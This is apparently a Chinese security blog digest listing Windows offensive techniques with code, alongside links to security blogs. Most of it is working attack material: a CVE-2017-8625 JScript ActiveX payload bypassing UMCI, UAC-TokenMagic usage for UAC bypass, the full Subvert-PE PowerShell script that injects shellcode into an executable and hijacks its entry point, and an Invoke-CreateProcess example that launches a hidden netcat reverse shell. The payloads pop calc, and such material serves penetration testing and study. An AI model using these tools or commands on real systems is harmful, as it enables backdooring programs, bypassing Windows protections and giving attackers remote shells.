每日安全干货及动态--第二期

enter description here

安全项目

使用Vulhub一键搭建漏洞测试靶场
https://vulhub.org/#/index/

CVE-2017-11882
https://github.com/unamer/CVE-2017-11882/
 

1.Forfiles ( 弹计算器)

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

https://technet.microsoft.com/zh-cn/library/cc753551(v=ws.10).aspx
 
enter description here

演示如图:

enter description here

 

2.CVE-2017-8625 -HTML-IE

1
2
3
4
5
6
7
<html> 
<body>
<script type="text/jscript">
var r =new ActiveXObject("Wscript.shell").Run("calc.exe");
</script>
</body>
</html>

使用CVE-2017-8625 – 绕过设备保护UMCI

https://msitpros.com/?p=3909

enter description here

https://enigma0x3.net/2017/08/24/umci-vs-internet-explorer-exploring-cve-2017-8625/?utm_campaign=crowdfire&utm_content=crowdfire&utm_medium=social&utm_source=twitter#238993254-tw#1503674775121

enter description here

演示如图:

enter description here

 

3.UAC-TokenMagic.ps1绕UAC

https://github.com/FuzzySecurity/PowerShell-Suite

参考:

https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html

1
2
3
4
.EXAMPLE C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe .
EXAMPLE C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -Args "/c ca
lc.exe" -ProcPID 1116
C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -ProcPID 3624

如图所示:

enter description here
 

4.Subvert-PE-shellcode- (Powershell 弹计算器)

http://www.fuzzysecurity.com/scripts/18.html

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
function Subvert-PE {
<#
.SYNOPSIS
Inject shellcode into a PE image while retaining the PE functionality.
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION
Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry point. After the shellcode executes, program execution is handed back over to the legitimate PE entry point.

.PARAMETER Path
Path to portable executable.

.PARAMETER Write
Inject shellcode and overwrite the PE. If omitted simply display "Entry Point", "Preferred Image Base" and dump the memory at the null-byte location.
.EXAMPLE
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe

.EXAMPLE
C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write
.LINK
http://www.fuzzysecurity.com/
#>
param (
[Parameter(Mandatory = $True)]
[string]$Path,
[parameter(parametersetname="Write")]
[switch]$Write
)
# Read File bytes
$bytes = [System.IO.File]::ReadAllBytes($Path)

New-Variable -Option Constant -Name Magic -Value @{
"010b" = "PE32"
"020b" = "PE32+"
}

# Function courtesy of @mattifestation
function Local:ConvertTo-Int{
Param(
[Parameter(Position = 1, Mandatory = $True)]
[Byte[]]
$array)
switch ($array.Length){
# Convert to WORD & DWORD
2 { Write-Output ( [UInt16] ('0x{0}' -f (($array | % {$_.ToString('X2')}) -join '')) ) }
4 { Write-Output ( [Int32] ('0x{0}' -f (($array | % {$_.ToString('X2')}) -join '')) ) }
}
}

# Offsets for calculations
$PE = ConvertTo-Int $bytes[63..60]
$NumOfPESection = ConvertTo-Int $bytes[($PE+7)..($PE+6)]
$OptSize = ConvertTo-Int $bytes[($PE+21)..($PE+20)]
$Opt = $PE + 24
$SecTbl = $Opt + $OptSize

# Entry point offset
$EntryPointOffset = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)])
# Duplicate for calculating JMP later
$EntryPointBefore = ConvertTo-Int $bytes[($Opt+19)..($Opt+16)]
echo "`nLegitimate Entry Point Offset: 0x$EntryPointOffset"

# PE magic number
$MagicVal = $Magic[('{0:X4}' -f (ConvertTo-Int $bytes[($Opt+1)..($Opt+0)]))]
# Preferred ImageBase, based on $MagicVal --> PE32 (DWORD), PE32+ (QWORD)
If($MagicVal -eq "PE32"){
$ImageBase = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+31)..($Opt+28)])

}
ElseIf($MagicVal -eq "PE32+"){
$QWORD = ( [UInt64] ('0x{0}' -f ((($bytes[($Opt+30)..($Opt+24)]) | % {$_.ToString('X2')}) -join '')) )
$ImageBase = '{0:X16}' -f $QWORD
}

# Preferred Image Base
echo "Preferred PE Image Base: 0x$ImageBase"

# Grab "Virtual Size" and "Virtual Address" for the CODE section.
$SecVirtualSize = ConvertTo-Int $bytes[($SecTbl+11)..($SecTbl+8)]
$SecVirtualAddress = ConvertTo-Int $bytes[($SecTbl+15)..($SecTbl+12)]

# Precise start of CODE null-byte section!
$NullCount = '{0:X8}' -f ($SecVirtualSize + $SecVirtualAddress)

# Offset in PE is different [$SecVirtualSize + $SecVirtualAddress - ($SecVirtualAddress - $SecPTRRawData)]
$SecPTRRawData = ConvertTo-Int $bytes[($SecTbl+23)..($SecTbl+20)]
$ShellCodeWrite = ($SecVirtualSize + $SecVirtualAddress - ($SecVirtualAddress - $SecPTRRawData))

# Hexdump of null-byte padding (before)
echo "`nNull-Byte Padding dump:"
$output = ""
foreach ( $count in $bytes[($ShellCodeWrite - 1)..($ShellCodeWrite+504)] ) {
if (($output.length%32) -eq 0){
$output += "`n"
}
else{
$output += "{0:X2} " -f $count
}
} echo "$output`n"

# If -Write flag is set
if($Write){

# Set shellcode variable based on PE architecture
If($MagicVal -eq "PE32"){
# 32-bit Universal WinExe (+ restore registers) --> calc (by SkyLined)
# Size: 76 bytes
$ShellCode = @(0x60,0x31,0xD2,0x52,0x68,0x63,0x61,0x6C,0x63,
0x54,0x59,0x52,0x51,0x64,0x8B,0x72,0x30,0x8B,0x76,0x0C,0x8B,
0x76,0x0C,0xAD,0x8B,0x30,0x8B,0x7E,0x18,0x8B,0x5F,0x3C,0x8B,
0x5C,0x1F,0x78,0x8B,0x74,0x1F,0x20,0x01,0xFE,0x8B,0x54,0x1F,
0x24,0x0F,0xB7,0x2C,0x17,0x42,0x42,0xAD,0x81,0x3C,0x07,0x57,
0x69,0x6E,0x45,0x75,0xF0,0x8B,0x74,0x1F,0x1C,0x01,0xFE,0x03,
0x3C,0xAE,0xFF,0xD7,0x58,0x58,0x61)
}
ElseIf($MagicVal -eq "PE32+"){
# 64-bit Universal WinExe (+ restore registers) --> calc (by SkyLined)
# Size: 97 bytes
$ShellCode = @(0x53,0x56,0x57,0x55,0x6A,0x60,0x5A,0x68,0x63,
0x61,0x6C,0x63,0x54,0x59,0x48,0x29,0xD4,0x65,0x48,0x8B,0x32,
0x48,0x8B,0x76,0x18,0x48,0x8B,0x76,0x10,0x48,0xAD,0x48,0x8B,
0x30,0x48,0x8B,0x7E,0x30,0x03,0x57,0x3C,0x8B,0x5C,0x17,0x28,
0x8B,0x74,0x1F,0x20,0x48,0x01,0xFE,0x8B,0x54,0x1F,0x24,0x0F,
0xB7,0x2C,0x17,0x8D,0x52,0x02,0xAD,0x81,0x3C,0x07,0x57,0x69,
0x6E,0x45,0x75,0xEF,0x8B,0x74,0x1F,0x1C,0x48,0x01,0xFE,0x8B,
0x34,0xAE,0x48,0x01,0xF7,0x99,0xFF,0xD7,0x48,0x83,0xC4,0x68,
0x5D,0x5F,0x5E,0x5B)
}

# Inject all the things!
for($i=0; $i -lt $ShellCode.Length; $i++){
$bytes[($ShellCodeWrite + $i)] = $ShellCode[$i]
}

# Set new Entry Point Offset --> $NullCount
$bytes[($Opt+19)] = [byte]('0x' + $NullCount.Substring(0,2))
$bytes[($Opt+18)] = [byte]('0x' + $NullCount.Substring(2,2))
$bytes[($Opt+17)] = [byte]('0x' + $NullCount.Substring(4,2))
$bytes[($Opt+16)] = [byte]('0x' + $NullCount.Substring(6,2))

# Modified Entry Point
$EntryPointOffset = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)])
echo "Modified Entry Point Offset: 0x$EntryPointOffset"

# Calculate & append farJMP
$Distance = '{0:x}' -f ($EntryPointBefore - (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)]) - $ShellCode.Length - 5)
echo "Inject Far JMP: 0xe9$Distance"
$bytes[($ShellCodeWrite + $ShellCode.Length)] = 0xE9
$bytes[($ShellCodeWrite + $ShellCode.Length + 1)] = [byte]('0x' + $Distance.Substring(6,2))
$bytes[($ShellCodeWrite + $ShellCode.Length + 2)] = [byte]('0x' + $Distance.Substring(4,2))
$bytes[($ShellCodeWrite + $ShellCode.Length + 3)] = [byte]('0x' + $Distance.Substring(2,2))
$bytes[($ShellCodeWrite + $ShellCode.Length + 4)] = [byte]('0x' + $Distance.Substring(0,2))

# Hexdump of null-byte padding (after)
echo "`nNull-Byte Padding After:"
$output = ""
foreach ( $count in $bytes[($ShellCodeWrite - 1)..($ShellCodeWrite+504)] ) {
if (($output.length%32) -eq 0){
$output += "`n"
}
else{
$output += "{0:X2} " -f $count
}
} echo "$output`n"

[System.IO.File]::WriteAllBytes($Path, $bytes)
}
}

视频演示:

5.Invoke-CreateProcess (Powershell 弹计算器)

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
function Invoke-CreateProcess {
<#
.SYNOPSIS
-Binary Full path of the module to be executed.

-Args Arguments to pass to the module, e.g. "/c calc.exe". Defaults
to $null if not specified.

-CreationFlags Process creation flags:
0x00000000 (NONE)
0x00000001 (DEBUG_PROCESS)
0x00000002 (DEBUG_ONLY_THIS_PROCESS)
0x00000004 (CREATE_SUSPENDED)
0x00000008 (DETACHED_PROCESS)
0x00000010 (CREATE_NEW_CONSOLE)
0x00000200 (CREATE_NEW_PROCESS_GROUP)
0x00000400 (CREATE_UNICODE_ENVIRONMENT)
0x00000800 (CREATE_SEPARATE_WOW_VDM)
0x00001000 (CREATE_SHARED_WOW_VDM)
0x00040000 (CREATE_PROTECTED_PROCESS)
0x00080000 (EXTENDED_STARTUPINFO_PRESENT)
0x01000000 (CREATE_BREAKAWAY_FROM_JOB)
0x02000000 (CREATE_PRESERVE_CODE_AUTHZ_LEVEL)
0x04000000 (CREATE_DEFAULT_ERROR_MODE)
0x08000000 (CREATE_NO_WINDOW)

-ShowWindow Window display flags:
0x0000 (SW_HIDE)
0x0001 (SW_SHOWNORMAL)
0x0001 (SW_NORMAL)
0x0002 (SW_SHOWMINIMIZED)
0x0003 (SW_SHOWMAXIMIZED)
0x0003 (SW_MAXIMIZE)
0x0004 (SW_SHOWNOACTIVATE)
0x0005 (SW_SHOW)
0x0006 (SW_MINIMIZE)
0x0007 (SW_SHOWMINNOACTIVE)
0x0008 (SW_SHOWNA)
0x0009 (SW_RESTORE)
0x000A (SW_SHOWDEFAULT)
0x000B (SW_FORCEMINIMIZE)
0x000B (SW_MAX)

-StartF Bitfield to influence window creation:
0x00000001 (STARTF_USESHOWWINDOW)
0x00000002 (STARTF_USESIZE)
0x00000004 (STARTF_USEPOSITION)
0x00000008 (STARTF_USECOUNTCHARS)
0x00000010 (STARTF_USEFILLATTRIBUTE)
0x00000020 (STARTF_RUNFULLSCREEN)
0x00000040 (STARTF_FORCEONFEEDBACK)
0x00000080 (STARTF_FORCEOFFFEEDBACK)
0x00000100 (STARTF_USESTDHANDLES)
.DESCRIPTION
Author: Ruben Boonen (@FuzzySec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.EXAMPLE
Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW
C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1

.EXAMPLE
Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW
C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1
#>
param (
[Parameter(Mandatory = $True)]
[string]$Binary,
[Parameter(Mandatory = $False)]
[string]$Args=$null,
[Parameter(Mandatory = $True)]
[Int]$CreationFlags,
[Parameter(Mandatory = $True)]
[Int]$ShowWindow,
[Parameter(Mandatory = $True)]
[Int]$StartF
)
# Define all the structures for CreateProcess
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}

[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO
{
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}

[StructLayout(LayoutKind.Sequential)]
public struct SECURITY_ATTRIBUTES
{
public int length;
public IntPtr lpSecurityDescriptor;
public bool bInheritHandle;
}

public static class Kernel32
{
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool CreateProcess(
string lpApplicationName,
string lpCommandLine,
ref SECURITY_ATTRIBUTES lpProcessAttributes,
ref SECURITY_ATTRIBUTES lpThreadAttributes,
bool bInheritHandles,
uint dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
ref STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
}
"@

# StartupInfo Struct
$StartupInfo = New-Object STARTUPINFO
$StartupInfo.dwFlags = $StartF # StartupInfo.dwFlag
$StartupInfo.wShowWindow = $ShowWindow # StartupInfo.ShowWindow
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size

# ProcessInfo Struct
$ProcessInfo = New-Object PROCESS_INFORMATION

# SECURITY_ATTRIBUTES Struct (Process & Thread)
$SecAttr = New-Object SECURITY_ATTRIBUTES
$SecAttr.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SecAttr)

# CreateProcess --> lpCurrentDirectory
$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

# Call CreateProcess
[Kernel32]::CreateProcess($Binary, $Args, [ref] $SecAttr, [ref] $SecAttr, $false, $CreationFlags, [IntPtr]::Zero, $GetCurrentPath, [ref] $StartupInfo, [ref] $ProcessInfo) |out-null

echo "`nProcess Information:"
Get-Process -Id $ProcessInfo.dwProcessId |ft
}

如图所示

enter description here

技术博客推荐:

1.Google的Project Zero团队博客

https://googleprojectzero.blogspot.co.uk/

2.NetSPI博客

https://blog.netspi.com/

3.html5安全备忘录

https://html5sec.org/

4.寻找内存中的.NET攻击

https://www.endgame.com/blog/technical-blog/hunting-memory-net-attacks

5.klion’s blog

https://klionsec.github.io/